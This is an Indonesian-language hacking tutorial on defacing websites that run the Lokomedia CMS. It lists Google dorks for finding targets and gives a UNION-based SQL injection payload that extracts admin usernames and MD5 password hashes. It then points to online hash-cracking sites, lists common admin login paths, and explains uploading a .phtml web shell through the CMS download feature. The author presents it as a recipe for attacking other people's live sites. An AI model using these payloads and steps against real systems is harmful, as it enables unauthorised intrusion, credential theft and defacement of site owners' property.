Deface Metode SQLi LokoMedia
Baiklah Kali ini saya akan Memberikan tutorial cara deface metode SQLi Lokomedia
Pertama kalian siapkan
- Laptop/pc yang terhubung di Internet...hehehe jelas lah :v
- Kopi/Teh Dan Cemilan :v
- Shell yang berekstensi .phtml
Dork Nya :
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
inurl:statis-1-visimisi.html
inurl:statis-1-tujuan.html
Lalu Kalian Pilih salah satu web yg akan kalian deface,,lalu masukkan exploit nya
'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
Cara Masukin Exploit Nya ===> Contoh: www.sitetarget.com/statis-3(masukkan explot nya disini)-strukturorganisasi.html
Dan Jadinya akan seperti ini
Lalu Kalian Tekan CTRL + U untuk melihat user dan password si target
Maka Jadinya Akan Seperti Ini
Nah Sekarang User Dan Password Si Target Sudah Terlihat..Password Si korban Masih Dalam Bentuk Md5..Jadi,kalian harus decrypt dulu password nya..Cara decrypt nya,kalian menggunakan Hashkiller Atau md5online.org
Link Nya
===> HashKiller
===> Md5Online
Nah Sekarang Gua dapat Password Nya..Tinggal Kalian Login
Untuk login biasanya di
/redaktur
/adminweb
/administrator
/redaktur/index.php
/adminlogin
/admin
/login.php
JIKA WEB NYA GAK VULN MAKA KALIAN HARUS CARI WEB LAIN,,HIHIHIHI :v :v :v
Kali ini Gua login Di /adminweb
Jika Login Berhasil,,Maka Hasil Nya Akan Seperti Ini
Setelah Itu Kalian Upload Shell Kalian Yang Berektensi .phtml Di bagian Download
Lalu Kalian Klik Tambah Download,,Lalu Upload Shell Kalian
Karena Saya Gak Nebas Index,,Jadi Saya Hanya Mengupload Script Deface Saya
JAGA WEB INDONESIA BRO,HIHIHI :V :V :V
Jika Selesai Mengupload Shell Kalian,,Maka Kalian Akses Shell Kalian Dengan Cara
Contoh: www.sitetarget.com/files/namashellkalian.phtml
DAN HASIL NYA!!!!!
Masih Kurang Paham??,,Silahkan Lihat Video Nya :
OKE SEKIAN DARI SAYA..JIKA ADA KEKURANGAN MOHON DI MAAFKAN
~Mr. Forbidden404
THANKS